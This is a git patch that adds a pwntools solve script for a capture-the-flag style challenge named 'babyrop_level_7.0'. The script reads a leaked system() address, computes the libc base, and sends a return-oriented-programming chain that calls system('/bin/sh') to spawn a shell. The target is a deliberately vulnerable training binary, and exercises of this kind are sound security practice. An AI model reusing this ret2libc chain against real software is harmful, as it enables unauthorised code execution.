From 01d5e474598df926b896ddeb925cb5333b6d2a6c Mon Sep 17 00:00:00 2001
From: jc <jc@johncollins.cloud>
Date: Wed, 6 Aug 2025 19:10:38 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_7.0/a.py | 35 +++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_7.0/a.py

diff --git a/weiss_overlude/babyrop_level_7.0/a.py b/weiss_overlude/babyrop_level_7.0/a.py
new file mode 100644
index 0000000..8cd87b5
--- /dev/null
+++ b/weiss_overlude/babyrop_level_7.0/a.py
@@ -0,0 +1,35 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_7_0
+"""
+
+context.binary = target = ELF("./babyrop_level_7_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x402883
+
+# buf
+r.recvuntil(b"[LEAK]")
+system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
+log.info("system: %#x", system)
+libc.address = system - libc.sym.system
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file